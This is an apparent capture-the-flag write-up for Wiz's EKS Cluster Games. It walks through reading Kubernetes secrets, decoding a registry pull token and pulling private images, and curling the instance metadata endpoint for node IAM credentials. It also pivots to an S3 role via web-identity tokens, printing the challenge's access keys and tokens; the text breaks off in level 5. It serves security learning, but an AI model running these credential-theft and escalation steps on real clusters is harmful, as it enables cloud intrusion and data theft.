Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page
  • Level 1: Secret Seeker
  • Level 2: Registry Hunt
  • Level 3: Image Inquisition
  • Level 4: Pod Break
  • Level 5: Container Secrets Infrastructure

Was this helpful?

  1. 2023

EKS Cluster Games

PreviousFlag 10NextBig IAM Challenge

Last updated 1 year ago

Was this helpful?

The is a cloud security Capture The Flag (CTF) event organize by Wiz with the goal of identifying and and learning about common Amazon EKS security issues

To learn more:


Level 1: Secret Seeker

Permission

{
    "secrets": [
        "get",
        "list"
    ]
}

Our service account permission

kubectl auth can-i --list

warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources                                       Non-Resource URLs                     Resource Names     Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                                    []                 [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                    []                 [create]
secrets                                         []                                    []                 [get list]
                                                [/.well-known/openid-configuration]   []                 [get]
                                                [/api/*]                              []                 [get]
                                                [/api]                                []                 [get]
                                                [/apis/*]                             []                 [get]
                                                [/apis]                               []                 [get]
                                                [/healthz]                            []                 [get]
                                                [/healthz]                            []                 [get]
                                                [/livez]                              []                 [get]
                                                [/livez]                              []                 [get]
                                                [/openapi/*]                          []                 [get]
                                                [/openapi]                            []                 [get]
                                                [/openid/v1/jwks]                     []                 [get]
                                                [/readyz]                             []                 [get]
                                                [/readyz]                             []                 [get]
                                                [/version/]                           []                 [get]
                                                [/version/]                           []                 [get]
                                                [/version]                            []                 [get]
                                                [/version]                            []                 [get]
podsecuritypolicies.policy                      []                                    [eks.privileged]   [use]

We can see that the service account has list, get permission on secrets, lets try listing it out.

kubectl get secrets -o yaml

apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ==
  kind: Secret
  metadata:
    creationTimestamp: "2023-11-01T13:02:08Z"
    name: log-rotate
    namespace: challenge1
    resourceVersion: "890951"
    uid: 03f6372c-b728-4c5b-ad28-70d5af8d387c
  type: Opaque
kind: List
metadata:
  resourceVersion: ""

We can see the flag in base64

root@wiz-eks-challenge:~# echo "d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ"| base64 -d
wiz_eks_challenge{omg_over_privileged_secret_access}base64: invalid input

Flag: wiz_eks_challenge{omg_over_privileged_secret_access}

Reference:


Level 2: Registry Hunt

Permissions

{
    "secrets": [
        "get"
    ],
    "pods": [
        "list",
        "get"
    ]
}

Listing the pods

kubectl get pods

NAME                    READY   STATUS    RESTARTS     AGE
database-pod-2c9b3a4e   1/1     Running   1 (9d ago)   45d
kubectl get pods database-pod-2c9b3a4e -o yaml
apiVersion: v1
kind: Pod
metadata:
  annotations:
    kubernetes.io/psp: eks.privileged
    pulumi.com/autonamed: "true"
  creationTimestamp: "2023-11-01T13:32:05Z"
  name: database-pod-2c9b3a4e
  namespace: challenge2
  resourceVersion: "12166896"
  uid: 57fe7d43-5eb3-4554-98da-47340d94b4a6
spec:
  containers:
  - image: eksclustergames/base_ext_image
    imagePullPolicy: Always
    name: my-container
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-cq4m2
      readOnly: true
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  imagePullSecrets:
  - name: registry-pull-secrets-780bab1d
  nodeName: ip-192-168-21-50.us-west-1.compute.internal
  preemptionPolicy: PreemptLowerPriority
  priority: 0
  restartPolicy: Always
  schedulerName: default-scheduler
  securityContext: {}
  serviceAccount: default
  serviceAccountName: default
  terminationGracePeriodSeconds: 30
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 300
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 300
  volumes:
  - name: kube-api-access-cq4m2
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 3607
          path: token
      - configMap:
          items:
          - key: ca.crt
            path: ca.crt
          name: kube-root-ca.crt
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
            path: namespace
status:
  conditions:
  - lastProbeTime: null
    lastTransitionTime: "2023-11-01T13:32:05Z"
    status: "True"
    type: Initialized
  - lastProbeTime: null
    lastTransitionTime: "2023-12-07T19:54:26Z"
    status: "True"
    type: Ready
  - lastProbeTime: null
    lastTransitionTime: "2023-12-07T19:54:26Z"
    status: "True"
    type: ContainersReady
  - lastProbeTime: null
    lastTransitionTime: "2023-11-01T13:32:05Z"
    status: "True"
    type: PodScheduled
  containerStatuses:
  - containerID: containerd://8010fe76a2bcad0d49b7d810efd7afdecdf00815a9f5197b651b26ddc5de1eb0
    image: docker.io/eksclustergames/base_ext_image:latest
    imageID: docker.io/eksclustergames/base_ext_image@sha256:a17a9428af1cc25f2158dfba0fe3662cad25b7627b09bf24a915a70831d82623
    lastState:
      terminated:
        containerID: containerd://b427307b7f428bcf6a50bb40ebef194ba358f77dbdb3e7025f46be02b922f5af
        exitCode: 0
        finishedAt: "2023-12-07T19:54:25Z"
        reason: Completed
        startedAt: "2023-11-01T13:32:08Z"
    name: my-container
    ready: true
    restartCount: 1
    started: true
    state:
      running:
        startedAt: "2023-12-07T19:54:26Z"
  hostIP: 192.168.21.50
  phase: Running
  podIP: 192.168.12.173
  podIPs:
  - ip: 192.168.12.173
  qosClass: BestEffort
  startTime: "2023-11-01T13:32:05Z"

We can see that ImagePullSecrets name is registry-pull-secrets-780bab1d

Based on the kubernetes documentation, we know that ImagePullSecrets ios referencing a secret in the same namespace.

Listing out the secrets, we can retrieve the credentials for the private registry

kubectl get secret registry-pull-secrets-780bab1d -o yaml
apiVersion: v1
data:
  .dockerconfigjson: eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19
kind: Secret
metadata:
  annotations:
    pulumi.com/autonamed: "true"
  creationTimestamp: "2023-11-01T13:31:29Z"
  name: registry-pull-secrets-780bab1d
  namespace: challenge2
  resourceVersion: "897340"
  uid: 1348531e-57ff-42df-b074-d9ecd566e18b
type: kubernetes.io/dockerconfigjson

Decoding the .dockerconfigjson jwt token gives us the authentication token, which can further be decoded to the credentials.

echo 'eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19' | base64 -d
{"auths": {"index.docker.io/v1/": {"auth": "ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw=="}}}

echo 'ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw==' | base64 -d
eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo

Since crane is pre-installed, we can use crane to authenticate and pull from the docker registry

crane auth login [OPTIONS] [SERVER] [flags]

  
  # Log in to reg.example.com
  crane auth login reg.example.com -u AzureDiamond -p hunter2

To login to index.docker.io, we will use the following command.

crane auth login index.docker.io -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo

2023/12/17 03:58:28 logged in via /home/user/.docker/config.json

Reading the /home/user/.docker/config.json files shows that we have authenticated succesfully.

cat /home/user/.docker/config.json
{
        "auths": {
                "https://index.docker.io/v1/": {
                        "auth": "ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw=="
                }
        }
}
crane ls index.docker.io/eksclustergames/base_ext_image --full-ref
index.docker.io/eksclustergames/base_ext_image:latest

crane pull index.docker.io/eksclustergames/base_ext_image:latest image.tar

Doing some manual enumeration allows us to retrieve the flag

tar xfv image.tar 
sha256:add093cd268deb7817aee1887b620628211a04e8733d22ab5c910f3b6cc91867
3f4d90098f5b5a6f6a76e9d217da85aa39b2081e30fa1f7d287138d6e7bf0ad7.tar.gz
193bf7018861e9ee50a4dc330ec5305abeade134d33d27a78ece55bf4c779e06.tar.gz
manifest.json

tar xfCv 193bf7018861e9ee50a4dc330ec5305abeade134d33d27a78ece55bf4c779e06.tar.gz stuff2
etc/
flag.txt
proc/
proc/.wh..wh..opq
sys/
sys/.wh..wh..opq

cat stuff2/flag.txt
wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}

We can also view the configuration of the image using crane config

crane config eksclustergames/base_ext_image:latest | jq

{
  "architecture": "amd64",
  "config": {
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sleep",
      "3133337"
    ],
    "ArgsEscaped": true,
    "OnBuild": null
  },
  "created": "2023-11-01T13:32:18.920734382Z",
  "history": [
    {
      "created": "2023-07-18T23:19:33.538571854Z",
      "created_by": "/bin/sh -c #(nop) ADD file:7e9002edaafd4e4579b65c8f0aaabde1aeb7fd3f8d95579f7fd3443cef785fd1 in / "
    },
    {
      "created": "2023-07-18T23:19:33.655005962Z",
      "created_by": "/bin/sh -c #(nop)  CMD [\"sh\"]",
      "empty_layer": true
    },
    {
      "created": "2023-11-01T13:32:18.920734382Z",
      "created_by": "RUN sh -c echo 'wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}' > /flag.txt # buildkit",
      "comment": "buildkit.dockerfile.v0"
    },
    {
      "created": "2023-11-01T13:32:18.920734382Z",
      "created_by": "CMD [\"/bin/sleep\" \"3133337\"]",
      "comment": "buildkit.dockerfile.v0",
      "empty_layer": true
    }
  ],
  "os": "linux",
  "rootfs": {
    "type": "layers",
    "diff_ids": [
      "sha256:3d24ee258efc3bfe4066a1a9fb83febf6dc0b1548dfe896161533668281c9f4f",
      "sha256:a70cef1cb742e242b33cc21f949af6dc7e59b6ea3ce595c61c179c3be0e5d432"
    ]
  }
}

Flag: wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}

Interestingly, this attack path is based on 2 real engagement on Alibaba Cloud and IBM Cloud linked below.

Reference:


Level 3: Image Inquisition

Permission

{
    "pods": [
        "list",
        "get"
    ]
}

Doing the same pod enumeration, since we have list and get pods permission

kubectl get pods accounting-pod-876647f8 -o yaml
apiVersion: v1
kind: Pod
metadata:
  annotations:
    kubernetes.io/psp: eks.privileged
    pulumi.com/autonamed: "true"
  creationTimestamp: "2023-11-01T13:32:10Z"
  name: accounting-pod-876647f8
  namespace: challenge3
  resourceVersion: "12166911"
  uid: dd2256ae-26ca-4b94-a4bf-4ac1768a54e2
spec:
  containers:
  - image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
    imagePullPolicy: IfNotPresent
    name: accounting-container
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-mmvjj
      readOnly: true
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  nodeName: ip-192-168-21-50.us-west-1.compute.internal
  preemptionPolicy: PreemptLowerPriority
  priority: 0
  restartPolicy: Always
  schedulerName: default-scheduler
  securityContext: {}
  serviceAccount: default
  serviceAccountName: default
  terminationGracePeriodSeconds: 30
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 300
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 300
  volumes:
  - name: kube-api-access-mmvjj
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 3607
          path: token
      - configMap:
          items:
          - key: ca.crt
            path: ca.crt
          name: kube-root-ca.crt
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
            path: namespace
status:
  conditions:
  - lastProbeTime: null
    lastTransitionTime: "2023-11-01T13:32:10Z"
    status: "True"
    type: Initialized
  - lastProbeTime: null
    lastTransitionTime: "2023-12-07T19:54:29Z"
    status: "True"
    type: Ready
  - lastProbeTime: null
    lastTransitionTime: "2023-12-07T19:54:29Z"
    status: "True"
    type: ContainersReady
  - lastProbeTime: null
    lastTransitionTime: "2023-11-01T13:32:10Z"
    status: "True"
    type: PodScheduled
  containerStatuses:
  - containerID: containerd://665178aaf28ddd6d73bf88958605be9851e03eed9c1e61f1a1176a69719191f2
    image: sha256:575a75bed1bdcf83fba40e82c30a7eec7bc758645830332a38cef238cd4cf0f3
    imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
    lastState:
      terminated:
        containerID: containerd://c465d5104e6f4cac49da0b7495eb2f7c251770f8bf3ce4a1096cf5c704b9ebbe
        exitCode: 0
        finishedAt: "2023-12-07T19:54:28Z"
        reason: Completed
        startedAt: "2023-11-01T13:32:11Z"
    name: accounting-container
    ready: true
    restartCount: 1
    started: true
    state:
      running:
        startedAt: "2023-12-07T19:54:29Z"
  hostIP: 192.168.21.50
  phase: Running
  podIP: 192.168.5.251
  podIPs:
  - ip: 192.168.5.251
  qosClass: BestEffort
  startTime: "2023-11-01T13:32:10Z"

From the challenge description, we are running inside a compromised EKS Pod, and while in a AWS EKS Pod, we are able to steal the metadata credentials.

curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole

{"AccessKeyId":"ASIA2AVYNEVM3TDX5VPA","Expiration":"2023-12-18 02:55:30+00:00","SecretAccessKey":"x8he/k4hZVf3XeC05+Zt3SE2js1l5SNlGeNv2c/G","SessionToken":"FwoGZXIvYXdzEEsaDJSwL+do/UMYss5O+SK3AW6TiFtiYLJj64aaDRckHW9q5CqfHpxSvN5Le4DVDkKzEpxfif0lNQ89i4GoKhabhvzatg/rv7YGx4oQUImNFGf/FPwPEb6hLdIsHO3i3hRAqSzoVOg5dzv6nXKkSlUogp0oeQlrqw6d7/q4wwjMKRQmDPvCkqr0tmtWRpwksYjeod4wus1HP3Pw8sJBEVrbDjfjvXtATw5lGm1G/wiCzMrDJPK+b67OWcmQH0Rd9sB8LHzm3R9qTCiSzf6rBjItdu1cltD7s6hdSUFvjoOWMV87m8mZ0NFaTKXZUwvSPY6eGddSjbh+Eo39gbn3"}

Next, we can login using the aws configure command, and then manually setting the session token by modifying the .aws/credentials file.

Next, we confirm if the credentials is configured properly using the aws sts get-caller identity and then perform further enumeration.

Running aws ecr describe-repositories shows that there are 2 image repository within the registry.

Running aws ecr get-authorization-token allows us to retrieve the authorization tokene to login using crane.

Using the same command from level 2, I was able to login succesfully.

export password=$(aws ecr get-login-password)
crane auth login 688655246681.dkr.ecr.us-west-1.amazonaws.com -u AWS -p $password

We are able to retrieve the flag from the configuration file again.

crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c:374f28d8-container | jq

{
  "architecture": "amd64",
  "config": {
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sleep",
      "3133337"
    ],
    "ArgsEscaped": true,
    "OnBuild": null
  },
  "created": "2023-11-01T13:32:07.782534085Z",
  "history": [
    {
      "created": "2023-07-18T23:19:33.538571854Z",
      "created_by": "/bin/sh -c #(nop) ADD file:7e9002edaafd4e4579b65c8f0aaabde1aeb7fd3f8d95579f7fd3443cef785fd1 in / "
    },
    {
      "created": "2023-07-18T23:19:33.655005962Z",
      "created_by": "/bin/sh -c #(nop)  CMD [\"sh\"]",
      "empty_layer": true
    },
    {
      "created": "2023-11-01T13:32:07.782534085Z",
      "created_by": "RUN sh -c #ARTIFACTORY_USERNAME=challenge@eksclustergames.com ARTIFACTORY_TOKEN=wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future} ARTIFACTORY_REPO=base_repo /bin/sh -c pip install setuptools --index-url intrepo.eksclustergames.com # buildkit # buildkit",
      "comment": "buildkit.dockerfile.v0"
    },
    {
      "created": "2023-11-01T13:32:07.782534085Z",
      "created_by": "CMD [\"/bin/sleep\" \"3133337\"]",
      "comment": "buildkit.dockerfile.v0",
      "empty_layer": true
    }
  ],
  "os": "linux",
  "rootfs": {
    "type": "layers",
    "diff_ids": [
      "sha256:3d24ee258efc3bfe4066a1a9fb83febf6dc0b1548dfe896161533668281c9f4f",
      "sha256:9057b2e37673dc3d5c78e0c3c5c39d5d0a4cf5b47663a4f50f5c6d56d8fd6ad5"
    ]
  }
}

Flag: wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future}

Reference:


Level 4: Pod Break

Permission

{}

Upon solving level 3 challenge, we are being told that the credentials will be available in the pod for ease of use. However, as I manually modified the .aws/credentials file previously, I will need to retrieve the token from IMDS again and to re-configure with the level4 credentials/

Note that the pod service account has no permission, so we will be looking towards abusing the AWS permission instead.

aws eks get-token --cluster-name eks-challenge-cluster
{
    "kind": "ExecCredential",
    "apiVersion": "client.authentication.k8s.io/v1beta1",
    "spec": {},
    "status": {
        "expirationTimestamp": "2023-12-24T16:11:30Z",
        "token": "k8s-aws-v1.aHR0cHM6Ly9zdHMudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vP0FjdGlvbj1HZXRDYWxsZXJJZGVudGl0eSZWZXJzaW9uPTIwMTEtMDYtMTUmWC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BU0lBMkFWWU5FVk02TlpRMkdFVSUyRjIwMjMxMjI0JTJGdXMtd2VzdC0xJTJGc3RzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyMzEyMjRUMTU1NzMwWiZYLUFtei1FeHBpcmVzPTYwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCUzQngtazhzLWF3cy1pZCZYLUFtei1TZWN1cml0eS1Ub2tlbj1Gd29HWlhJdllYZHpFT24lMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkZ3RWFESDR3c3ZpTUY5MUtENHAlMkJuaUszQWJQaExkQ2JhJTJGJTJCaUozOXRpeXBjS09EZDZNSGx3Q1BsZG0lMkJLR3JRUGFpaG13ZkdrdGQ2S2gwOElKYjZVaGUxJTJGREZEZnlyODVBWnFBbXpYcHlvdEhtdXZKVDRnWWsydGZiQmxwdnJDa3FYVGlWeHZQbkdCYUhhSlVXRHZ4RE5BVnZqbGlPd1pSZ283UGhBQ3ZyOXR0JTJGTUpUNEFyZVY3d2tzR09jNk43cGppdEU1QWl0MEVJY2hwOCUyQmpyc1cySmZkaEtiRE9sNDQ0bGtZMDJLb2dhREpYeG1aWU9BVE1ncGRkMHl4UTBnbm1hTVhKU25FZXBiYSUyQmlqWm9xR3NCakl0N0lsMUFtSGNWZDlGcHhKWng1RGh1clpxcUR6WG9zeG8lMkZVRU1paHluQ0ZCdyUyQmFJZXBDZiUyRndlR1RadWIlMkYmWC1BbXotU2lnbmF0dXJlPTc2ZjNkYTI2MjA5Mzg3MDEwNzNjOWJhNmFhNTk4MmUzYmNkY2IxNzk1Y2RhYjhiNjRmMmMyZTMyNTU2ZWE2Nzg"
    }
}
TOKEN=$(aws eks get-token --cluster-name=eks-challenge-cluster | jq '.status.token' | sed "s/\"//g")

kubectl auth can-i --list --token=$TOKEN

We are able to then retrieve the flag from the secrets.

kubectl get secret --token=$TOKEN -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=
  kind: Secret
  metadata:
    creationTimestamp: "2023-11-01T12:27:57Z"
    name: node-flag
    namespace: challenge4
    resourceVersion: "883574"
    uid: 26461a29-ec72-40e1-adc7-99128ce664f7
  type: Opaque
kind: List
metadata:
  resourceVersion: ""

echo "d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=" | base64 -d
wiz_eks_challenge{only_a_real_pro_can_navigate_IMDS_to_EKS_congrats}

Flag: wiz_eks_challenge{only_a_real_pro_can_navigate_IMDS_to_EKS_congrats}

Reference:

Level 5: Container Secrets Infrastructure

Based on the description, we will need to pivot from EKS to the AWS account and retrieve a flag from AWS S3 bucket. First, lets take a look at the policy they have given.

Running a kubectl auth can-i --list to see the permission scope properly.

kubectl auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources                                       Non-Resource URLs   Resource Names     Verbs
serviceaccounts/token                           []                  [debug-sa]         [create]
selfsubjectaccessreviews.authorization.k8s.io   []                  []                 [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []                 [create]
pods                                            []                  []                 [get list]
secrets                                         []                  []                 [get list]
serviceaccounts                                 []                  []                 [get list]

We can see the user has permission on pods, secrets and service accounts, so lets enumerate and find out more.

kubectl get secrets -o yaml
apiVersion: v1
items: []
kind: List
metadata:
  resourceVersion: ""
  
kubectl get pods -o yaml
apiVersion: v1
items: []
kind: List
metadata:
  resourceVersion: ""

kubectl get serviceaccounts -o yaml
apiVersion: v1
items:
- apiVersion: v1
  kind: ServiceAccount
  metadata:
    annotations:
      description: This is a dummy service account with empty policy attached
      eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e
    creationTimestamp: "2023-10-31T20:07:37Z"
    name: debug-sa
    namespace: challenge5
    resourceVersion: "671929"
    uid: 6cb6024a-c4da-47a9-9050-59c8c7079904
- apiVersion: v1
  kind: ServiceAccount
  metadata:
    creationTimestamp: "2023-10-31T20:07:11Z"
    name: default
    namespace: challenge5
    resourceVersion: "671804"
    uid: 77bd3db6-3642-40d5-b8c1-14fa1b0cba8c
- apiVersion: v1
  kind: ServiceAccount
  metadata:
    annotations:
      eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeEksS3Role
    creationTimestamp: "2023-10-31T20:07:34Z"
    name: s3access-sa
    namespace: challenge5
    resourceVersion: "671916"
    uid: 86e44c49-b05a-4ebe-800b-45183a6ebbda
kind: List
metadata:
  resourceVersion: ""

From the enumeration, we can see there is two service account, namelydebug-sa and s3access-sa. Based on the permission from the kubectl auth can-i --list, we are able to create a service account token for the debug-sa account. Also note the EKS role arn assigned to both service account.

TOKEN=$(kubectl create token debug-sa)
kubectl auth can-i --list --token=$TOKEN

warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources                                       Non-Resource URLs                     Resource Names     Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                                    []                 [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                    []                 [create]
                                                [/.well-known/openid-configuration]   []                 [get]
                                                [/api/*]                              []                 [get]
                                                [/api]                                []                 [get]
                                                [/apis/*]                             []                 [get]
                                                [/apis]                               []                 [get]
                                                [/healthz]                            []                 [get]
                                                [/healthz]                            []                 [get]
                                                [/livez]                              []                 [get]
                                                [/livez]                              []                 [get]
                                                [/openapi/*]                          []                 [get]
                                                [/openapi]                            []                 [get]
                                                [/openid/v1/jwks]                     []                 [get]
                                                [/readyz]                             []                 [get]
                                                [/readyz]                             []                 [get]
                                                [/version/]                           []                 [get]
                                                [/version/]                           []                 [get]
                                                [/version]                            []                 [get]
                                                [/version]                            []                 [get]
podsecuritypolicies.policy                      []                                    [eks.privileged]   [use]

However, we have less permission within the pods using the debug service account, which is also inline with the debug-sa description of being a dummy account.

Based on the trust policy, theres the action of sts:AssumeRoleWithWebIdentity.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
                }
            }
        }
    ]
}
TOKEN=$(kubectl create token debug-sa --audience sts.amazonaws.com)

aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name something --web-identity-token $TOKEN

{
    "Credentials": {
        "AccessKeyId": "ASIA2AVYNEVM4L5OSGPW",
        "SecretAccessKey": "fiUdOL1u6kYo2qqwDiV5/99W1mbwZ/L0y+XdGJpI",
        "SessionToken": "IQoJb3JpZ2luX2VjEOz//////////wEaCXVzLXdlc3QtMSJIMEYCIQCk1qJGYAf5fic/6XZ08OeVmRPPnrfyftDQwH/mJE03kQIhAPhwKcHtbXSFambfgAIPGwSu+H+Ds6l7hCb1Bgt7jbJsKroECHUQABoMNjg4NjU1MjQ2NjgxIgw1sDbG9rHyXc/e3QoqlwRficlydMRZhiAt8DU4mBC3IXO87p3SqSCdzCs2qeic0A1Rx43+UN0IL0T0WiLpvHKo1+MCikStA0OuxGCuK+paBdmISQdw6XxxvMof+qzmyA/ntxajmkeYmAuqU2bx2jzHk8Q2wefD/1I+utp5BJLleGbVDxaO1kongQaLWjfFKwwJKdgos4PVey85BZoX24haobEcYSYfTZXtiuWpj3gU+Z+P4MA+c4aWsYZHxStE5XMGWf45Oki5gdsgiwznfvd+vBTWD8Zk17efJ0rGmADslPlfH0x29vqQgBSRg2+v1+JzXBehafZVgcobx910tNjy1EyKXuFIa4y2wtGPUNXrK8a9edoonePrqXQWJZzgphh8PXQsngGIbG1iTt4T78VzOYHWby9AyPpG5p/bVQ0l9ZAbag3rRYpBOyItWQvWRd2Jp+s3Zgv22Is8DZBOl7hUH5mshBQRWRjY9UUMeuSmWxyL617D3YaNmYRER6nn0EsLLd8LG863uLE5VYrGeuOSaZmvFIhmmxxLzyyr1uzngM3gr/LOt8ExKmHkQcAoDnX/JQts1Q9uuoNlc3Wr0OUZ18mWaVGg9RBHLc3uYbrk0CSZXItx7D/IJTiaJzZ/SHnFnw81AikUuk8e4cSGWhpagjIvqH9jS1NmMwuDHpcBs7sVO6qU5HQ5Oht75p3HOVq8Q0cvH/NPXW8iTN5NU9Zy9m5jJWZbMOrdpawGOpQBmiwUu2AW8lqnaI7sEGQvuUCJ/ACBRmEUj7j6rNMVVEH4S7kYOhcwbTLrHP4xoeFAk9hNHq29PIB3CHS0n7EOjkAgqwSFH7Bg2l3X+Z6JDOr07if0HeJPHkE1MwxILO03HooJHAiF7b/wBlMompCbZuf/po/e5lU2WL5pFcXO+GCAj3Qy6nlRR5RVx269ewK7qWefqQ==",
        "Expiration": "2023-12-25T13:00:42+00:00"
    },
    "SubjectFromWebIdentityToken": "system:serviceaccount:challenge5:debug-sa",
    "AssumedRoleUser": {
        "AssumedRoleId": "AROA2AVYNEVMZEZ2AFVYI:something",
        "Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/something"
    },
    "Provider": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
    "Audience": "sts.amazonaws.com"
}

Next, we can authenticate using aws configure with the new credentials and retrieve the flag.

aws configure
AWS Access Key ID [None]: ASIA2AVYNEVM4L5OSGPW
AWS Secret Access Key [None]: fiUdOL1u6kYo2qqwDiV5/99W1mbwZ/L0y+XdGJpI
Default region name [None]: us-west-1
Default output format [None]:

